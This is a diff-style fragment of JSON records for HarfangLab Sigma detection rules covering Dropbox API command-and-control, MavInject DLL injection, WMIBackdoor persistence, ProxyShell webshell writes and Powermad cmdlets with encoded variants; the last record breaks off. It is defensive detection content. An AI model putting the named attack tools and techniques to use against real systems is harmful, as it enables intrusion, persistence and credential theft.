+ "id": "2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.602948Z", + "creation_date": "2026-03-23T11:45:34.602952Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.602972Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securelist.com/bad-magic-apt/109087/", + "https://attack.mitre.org/techniques/T1071/001/" + ], + "name": "t1071_001_suspicious_url_request_to_dropbox.yml", + "content": "title: Suspicious URL Request to the Dropbox API\nid: 2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c\ndescription: |\n Detects suspicious URL requests to the Dropbox API.\n Adversaries can use legitimate webservices to hide malicious command and control traffic.\n The Powermagic malware is known to use the Dropbox API to communicate with the attackers.\n It is recommended to analyze the process performing the URL request to determine whether its network communication to the DropBox API is legitimate.\nreferences:\n - https://securelist.com/bad-magic-apt/109087/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/03/24\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1102.002\n - attack.exfiltration\n - attack.t1567.002\n - 
classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost:\n - 'content.dropboxapi.com'\n - 'api.dropboxapi.com'\n\n filter_dropbox:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n - 'Dropbox, Inc'\n - 'Piriform Software Ltd'\n\n filter_dropbox_useragent:\n UserAgent|startswith: 'DropboxWindowsApp/'\n\n exclusion_dropboxuniversal:\n ProcessOriginalFileName: 'DropboxUniversal.exe'\n\n exclusion_rekordbox:\n # https://api.dropboxapi.com/2/auth/token/revoke\n ProcessOriginalFileName: 'rekordbox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'AlphaTheta Corporation'\n\n exclusion_totalcmd64:\n ProcessOriginalFileName: 'totalcmd64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ghisler Software GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c", + "rule_name": "Suspicious URL Request to the Dropbox API", + "rule_description": "Detects suspicious URL requests to the Dropbox API.\nAdversaries can use legitimate webservices to hide malicious command and control traffic.\nThe Powermagic malware is known to use the Dropbox API to communicate with the attackers.\nIt is recommended to analyze the process performing the URL request to determine whether its network communication to the DropBox API is legitimate.\n", + "rule_creation_date": "2023-03-24", + "rule_modified_date": "2025-09-23", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.exfiltration" + ], + "rule_technique_tags": [ + 
"attack.t1071.001", + "attack.t1102.002", + "attack.t1567.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.615612Z", + "creation_date": "2026-03-23T11:45:34.615615Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.615623Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Mavinject/", + "https://attack.mitre.org/techniques/T1218/", + "https://attack.mitre.org/techniques/T1055/001/" + ], + "name": "t1218_mavinject.yml", + "content": "title: Process Injected via MavInject\nid: 2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3\ndescription: |\n Detects an attempt to open a process by mavinject.exe.\n This can be used by attackers to inject and execute an arbitrary DLL on any processes.\n It is recommended to check process' parents and the opened process for suspicious actions or content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mavinject/\n - https://attack.mitre.org/techniques/T1218/\n - 
https://attack.mitre.org/techniques/T1055/001/\ndate: 2021/06/16\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1055.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.Mavinject\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n GrantedAccess: '0x10143a'\n ProcessOriginalFileName:\n - 'mavinject32.exe'\n - 'mavinject64.exe'\n\n exclusion_appvisvsubsystems:\n ProcessCommandLine|contains:\n - '\\AppVIsvSubsystems32.dll'\n - '\\AppVIsvSubsystems64.dll'\n\n exclusion_appv:\n ProcessParentImage: '?:\\Windows\\System32\\AppVClient.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3", + "rule_name": "Process Injected via MavInject", + "rule_description": "Detects an attempt to open a process by mavinject.exe.\nThis can be used by attackers to inject and execute an arbitrary DLL on any processes.\nIt is recommended to check process' parents and the opened process for suspicious actions or content.\n", + "rule_creation_date": "2021-06-16", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1055.001", + "attack.t1218" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": 
"high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.624544Z", + "creation_date": "2026-03-23T11:45:34.624546Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.624550Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/mattifestation/WMI_Backdoor", + "https://attack.mitre.org/techniques/T1546/003/", + "https://attack.mitre.org/techniques/T1059/001/" + ], + "name": "t1546_003_wmi_backdoor_trigger_cmdlet.yml", + "content": "title: WMIBackdoor PowerShell Cmdlet Executed\nid: 2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b\ndescription: |\n Detects the execution of the WMIBackdoor.ps1 PowerShell script used to create WMI event subscription backdoors.\n This script establishes persistent malicious WMI event consumers that trigger on specific system events, allowing attackers to maintain access and execute arbitrary code.\n WMI event subscriptions are a common persistence mechanism that can survive reboots and are often difficult to detect through standard security tools.\n It is recommended to investigate the WMI event subscriptions on the system via the associated telemetry, analyze the triggered actions and payloads, and review the process tree for the parent process that executed this cmdlet.\nreferences:\n - https://github.com/mattifestation/WMI_Backdoor\n - 
https://attack.mitre.org/techniques/T1546/003/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2025/11/07\nmodified: 2025/12/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.003\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.WMIBackdoor\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n ScriptBlockText|contains:\n - 'New-WMIBackdoorTrigger'\n - 'New-WMIBackdoorAction'\n - 'Register-WMIBackdoor'\n\n condition: selection\nlevel: high\nconfidence: strong\n\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b", + "rule_name": "WMIBackdoor PowerShell Cmdlet Executed", + "rule_description": "Detects the execution of the WMIBackdoor.ps1 PowerShell script used to create WMI event subscription backdoors.\nThis script establishes persistent malicious WMI event consumers that trigger on specific system events, allowing attackers to maintain access and execute arbitrary code.\nWMI event subscriptions are a common persistence mechanism that can survive reboots and are often difficult to detect through standard security tools.\nIt is recommended to investigate the WMI event subscriptions on the system via the associated telemetry, analyze the triggered actions and payloads, and review the process tree for the parent process that executed this cmdlet.\n", + "rule_creation_date": "2025-11-07", + "rule_modified_date": "2025-12-08", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1059.001", + "attack.t1546.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" 
+} +{ + "id": "2f9bedc8-2825-415e-a921-7af30eb2aa12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.092287Z", + "creation_date": "2026-03-23T11:45:34.092289Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.092294Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.mandiant.com/resources/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers", + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", + "https://attack.mitre.org/techniques/T1190/", + "https://attack.mitre.org/techniques/T1505/003/" + ], + "name": "t1190_proxyshell_vulnerability_exploitation.yml", + "content": "title: Microsoft Exchange Server Vulnerability Exploitation\nid: 2f9bedc8-2825-415e-a921-7af30eb2aa12\ndescription: |\n Detects a possible exploitation of CVE-2021-31207 (aka ProxyShell) related to Microsoft Exchange server, that allows an attacker to write files to the system.\n The ProxyShell vulnerabilities consist of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting on-premises Microsoft Exchange servers 
that allow attackers to perform a pre-authenticated remote code execution.\n It is recommended to analyze the files written to disk to look for webshells or any suspicious content.\nreferences:\n - https://www.mandiant.com/resources/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2022/07/08\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.persistence\n - attack.t1505.003\n - cve.2021-31207\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.Exchange\n - classification.Windows.Exploit.ProxyShell\n - classification.Windows.Exploit.CVE-2021-34473\n - classification.Windows.Exploit.CVE-2021-34523\n - classification.Windows.Exploit.CVE-2021-31207\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\MSExchangeMailboxReplication.exe'\n Path|endswith:\n - '.aspx'\n - '.asp'\n - '.ashx'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2f9bedc8-2825-415e-a921-7af30eb2aa12", + "rule_name": "Microsoft Exchange Server Vulnerability Exploitation", + "rule_description": "Detects a possible exploitation of CVE-2021-31207 (aka ProxyShell) related to Microsoft Exchange server, that allows an attacker to write files to the system.\nThe ProxyShell vulnerabilities consist of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting on-premises Microsoft Exchange servers that allow attackers to perform a pre-authenticated remote code 
execution.\nIt is recommended to analyze the files written to disk to look for webshells or any suspicious content.\n", + "rule_creation_date": "2022-07-08", + "rule_modified_date": "2025-04-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.initial_access", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1190", + "attack.t1505.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2fd97120-c808-466a-81ed-6aabf72403a2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.604632Z", + "creation_date": "2026-03-23T11:45:34.604636Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.604643Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/Kevin-Robertson/Powermad", + "https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/", + "https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/", + "https://attack.mitre.org/techniques/T1059/001/", + "https://attack.mitre.org/techniques/T1557/001/" + ], + "name": 
"t1059_001_powershell_malicious_cmdlet_powermad_cmd.yml", + "content": "title: Malicious PowerShell Powermad Commandlets in Command-line\nid: 2fd97120-c808-466a-81ed-6aabf72403a2\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Powermad framework.\n The Powermad framework is generally associated with Active Directory Internal DNS (ADIDNS) exploitation for privilege escalation and credential collection through LLMNR poisoning (along with tools such as Inveigh) and SMB Relaying.\n It is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the PowerShell host process.\nreferences:\n - https://github.com/Kevin-Robertson/Powermad\n - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/\n - https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1557/001/\ndate: 2022/10/12\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.defense_evasion\n - attack.t1550.002\n - attack.persistence\n - attack.privilege_escalation\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerMad\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n selection_cmdlet:\n CommandLine|contains:\n # ================================== Machine Account Quota functions ==================================\n # Return machine account attributes.\n - 'Get-MachineAccountAttribute'\n - 'RwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQQB0AHQAcgBpAGIAdQB0AGUA'\n - 
'cAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEEAdAB0AHIAaQBiAHUAdABlA'\n - 'HAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABBAHQAdAByAGkAYgB1AHQAZQ'\n # Returns Machine Account Creator. Usually only set when the node was created by an unprivileged user.\n - 'Get-MachineAccountCreator'\n - 'RwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQwByAGUAYQB0AG8Acg'\n - 'cAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEMAcgBlAGEAdABvAHIA'\n - 'HAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABDAHIAZQBhAHQAbwByA'\n # Disables a machine account.\n - 'Disable-MachineAccount'\n - 'RABpAHMAYQBiAGwAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n - 'QAaQBzAGEAYgBsAGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'EAGkAcwBhAGIAbABlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n # Enables a machine account.\n - 'Enable-MachineAccount'\n - 'RQBuAGEAYgBsAGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'UAbgBhAGIAbABlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'FAG4AYQBiAGwAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Creates a new machine account through an encrypted LDAP request. 
Can then be used with the `runas` command.\n - 'New-MachineAccount'\n - 'TgBlAHcALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - '4AZQB3AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'OAGUAdwAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Removes a machine account with a privileged account.\n - 'Remove-MachineAccount'\n - 'UgBlAG0AbwB2AGUALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQA'\n - 'IAZQBtAG8AdgBlAC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0A'\n - 'SAGUAbQBvAHYAZQAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdA'\n # Set attributes for an account that was created with Powermad.\n - 'Set-MachineAccountAttribute'\n - 'UwBlAHQALQBNAGEAYwBoAGkAbgBlAEEAYwBjAG8AdQBuAHQAQQB0AHQAcgBpAGIAdQB0AGUA'\n - 'MAZQB0AC0ATQBhAGMAaABpAG4AZQBBAGMAYwBvAHUAbgB0AEEAdAB0AHIAaQBiAHUAdABlA'\n - 'TAGUAdAAtAE0AYQBjAGgAaQBuAGUAQQBjAGMAbwB1AG4AdABBAHQAdAByAGkAYgB1AHQAZQ'\n # Recursively creates Machine Accounts, allowed due to the Transitive Machine Account Quota and updates of the ms-DS-CreatorSID attribute.\n - 'Invoke-AgentSmith'\n - 'SQBuAHYAbwBrAGUALQBBAGcAZQBuAHQAUwBtAGkAdABoA'\n - 'kAbgB2AG8AawBlAC0AQQBnAGUAbgB0AFMAbQBpAHQAaA'\n - 'JAG4AdgBvAGsAZQAtAEEAZwBlAG4AdABTAG0AaQB0AGgA'\n # ========================================= ADIDNS Functions ==========================================\n # Used to add or delete ADIDNS dynamic DNS records if secure dynamic updates are configured on a DC.\n - 'Invoke-DNSUpdate'\n - 'SQBuAHYAbwBrAGUALQBEAE4AUwBVAHAAZABhAHQAZQ'\n - 'kAbgB2AG8AawBlAC0ARABOAFMAVQBwAGQAYQB0AGUA'\n - 'JAG4AdgBvAGsAZQAtAEQATgBTAFUAcABkAGEAdABlA'\n # Tombstone an ADIDNS node.\n - 'Disable-ADIDNSNode'\n - 'RABpAHMAYQBiAGwAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n - 'QAaQBzAGEAYgBsAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'EAGkAcwBhAGIAbABlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n # Revive tombstoned node.\n - 'Enable-ADIDNSNode'\n - 'RQBuAGEAYgBsAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'UAbgBhAGIAbABlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'FAG4AYQBiAGwAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Return values that populate a 
node attribute.\n - 'Get-ADIDNSNodeAttribute'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAEEAdAB0AHIAaQBiAHUAdABlA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBBAHQAdAByAGkAYgB1AHQAZQ'\n - 'HAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUAQQB0AHQAcgBpAGIAdQB0AGUA'\n # Returns the owner of a node.\n - 'Get-ADIDNSNodeOwner'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAE8AdwBuAGUAcg'\n - 'cAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBPAHcAbgBlAHIA'\n - 'HAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUATwB3AG4AZQByA'\n # Gets a DACL (Discretionary Access Control List, which users/groups can access an object) of an ADIDNS node or zone.\n - 'Get-ADIDNSPermission'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'HAGUAdAAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n # Returns ADIDNS zones.\n - 'Get-ADIDNSZone'\n - 'RwBlAHQALQBBAEQASQBEAE4AUwBaAG8AbgBlA'\n - 'cAZQB0AC0AQQBEAEkARABOAFMAWgBvAG4AZQ'\n - 'HAGUAdAAtAEEARABJAEQATgBTAFoAbwBuAGUA'\n # Adds access (ACE) to a node or zone DACL.\n - 'Grant-ADIDNSPermission'\n - 'RwByAGEAbgB0AC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'cAcgBhAG4AdAAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n - 'HAHIAYQBuAHQALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n # Creates a new node thorugh an encrypted LDAP request.\n - 'New-ADIDNSNode'\n - 'TgBlAHcALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - '4AZQB3AC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'OAGUAdwAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Creates a valid byte array for the dnsRecord attribute.\n - 'New-DNSRecordArray'\n - 'TgBlAHcALQBEAE4AUwBSAGUAYwBvAHIAZABBAHIAcgBhAHkA'\n - '4AZQB3AC0ARABOAFMAUgBlAGMAbwByAGQAQQByAHIAYQB5A'\n - 'OAGUAdwAtAEQATgBTAFIAZQBjAG8AcgBkAEEAcgByAGEAeQ'\n # Gets an SOA (Start of authority) serial number for a DNS zone and increments it.\n - 'New-SOASerialNumberArray'\n - 'TgBlAHcALQBTAE8AQQBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgBBAHIAcgBhAHkA'\n - '4AZQB3AC0AUwBPAEEAUwBlAHIAaQBhAGwATgB1AG0AYgBlAHIAQQByAHIAYQB5A'\n - 
'OAGUAdwAtAFMATwBBAFMAZQByAGkAYQBsAE4AdQBtAGIAZQByAEEAcgByAGEAeQ'\n # Renames a node.\n - 'Rename-ADIDNSNode'\n - 'UgBlAG4AYQBtAGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'IAZQBuAGEAbQBlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'SAGUAbgBhAG0AZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Removes a node.\n - 'Remove-ADIDNSNode'\n - 'UgBlAG0AbwB2AGUALQBBAEQASQBEAE4AUwBOAG8AZABlA'\n - 'IAZQBtAG8AdgBlAC0AQQBEAEkARABOAFMATgBvAGQAZQ'\n - 'SAGUAbQBvAHYAZQAtAEEARABJAEQATgBTAE4AbwBkAGUA'\n # Removes an ACE from a DACL.\n - 'Revoke-ADIDNSPermission'\n - 'UgBlAHYAbwBrAGUALQBBAEQASQBEAE4AUwBQAGUAcgBtAGkAcwBzAGkAbwBuA'\n - 'IAZQB2AG8AawBlAC0AQQBEAEkARABOAFMAUABlAHIAbQBpAHMAcwBpAG8Abg'\n - 'SAGUAdgBvAGsAZQAtAEEARABJAEQATgBTAFAAZQByAG0AaQBzAHMAaQBvAG4A'\n # Appends or overwrites node attributes.\n - 'Set-ADIDNSNodeAttribute'\n - 'UwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAEEAdAB0AHIAaQBiAHUAdABlA'\n - 'MAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBBAHQAdAByAGkAYgB1AHQAZQ'\n - 'TAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUAQQB0AHQAcgBpAGIAdQB0AGUA'\n # Sets the owner of a Node, SeRestorePrivilege token required.\n - 'Set-ADIDNSNodeOwner'\n - 'UwBlAHQALQBBAEQASQBEAE4AUwBOAG8AZABlAE8AdwBuAGUAcg'\n - 'MAZQB0AC0AQQBEAEkARABOAFMATgBvAGQAZQBPAHcAbgBlAHIA'\n - 'TAGUAdAAtAEEARABJAEQATgBTAE4AbwBkAGUATwB3AG4AZQByA'\n # Generating Kerberos AES-256 and 128 Keys for know username and password, this can be used as a PtH attack in InvokeDNSUPdate\n - 'Get-KerberosAESKey'\n - 'RwBlAHQALQBLAGUAcgBiAGUAcgBvAHMAQQBFAFMASwBlAHkA'\n - 'cAZQB0AC0ASwBlAHIAYgBlAHIAbwBzAEEARQBTAEsAZQB5A'\n - 'HAGUAdAAtAEsAZQByAGIAZQByAG8AcwBBAEUAUwBLAGUAeQ'\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2fd97120-c808-466a-81ed-6aabf72403a2", + "rule_name": "Malicious PowerShell Powermad Commandlets in Command-line", + "rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Powermad 
framework.\nThe Powermad framework is generally associated with Active Directory Internal DNS (ADIDNS) exploitation for privilege escalation and credential collection through LLMNR poisoning (along with tools such as Inveigh) and SMB Relaying.\nIt is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the PowerShell host process.\n", + "rule_creation_date": "2022-10-12", + "rule_modified_date": "2025-04-10", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.collection", + "attack.credential_access", + "attack.defense_evasion", + "attack.execution", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1059.001", + "attack.t1550.002", + "attack.t1557.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2fe027bc-7a3c-412a-9493-8581215d5157", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "low", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + 